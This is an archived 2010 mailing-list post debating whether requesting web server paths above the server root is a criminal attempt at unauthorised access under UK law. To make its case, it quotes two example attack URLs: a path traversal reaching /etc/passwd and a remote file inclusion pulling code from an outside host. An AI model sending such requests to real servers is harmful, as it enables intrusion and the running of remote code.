Being safe on the internet (was Re: Here we go again - ISP DPI, but is it interception?)
Jon Ribbens
jon+ukcrypto at unequivocal.co.uk
Wed Aug 4 14:29:14 BST 2010
On Wed, Aug 04, 2010 at 01:32:14PM +0100, Francis Davey wrote:
> > If the server operator did not intend to provide access above server root,
> > then they should have configured their server to provide an appropriate
> > (4xx) denial.
>
> Do we know they did not? You commit an offence of attempt if you try
> to do this even if the server operator has indeed secured themselves
> against unauthorised access. What the web server does or does not do
> is not nearly as important as one might think because of the Criminal
> Attempts Act.
Personally, I think that (attempting to) access http://example.com/
or http://example.com/../ shows little-to-no evidence of knowingly
attempting to access unauthorised data. If however, as is seen
commonly, someone attempts to access something like
http://example.com/../../../etc/passwd or
http://example.com/index.php?include=http://1.2.3.4/hax0r.inc
or similar, then the user is quite blatantly attempting unauthorised
access and can most certainly be regarded as a criminal.
More information about the ukcrypto
mailing list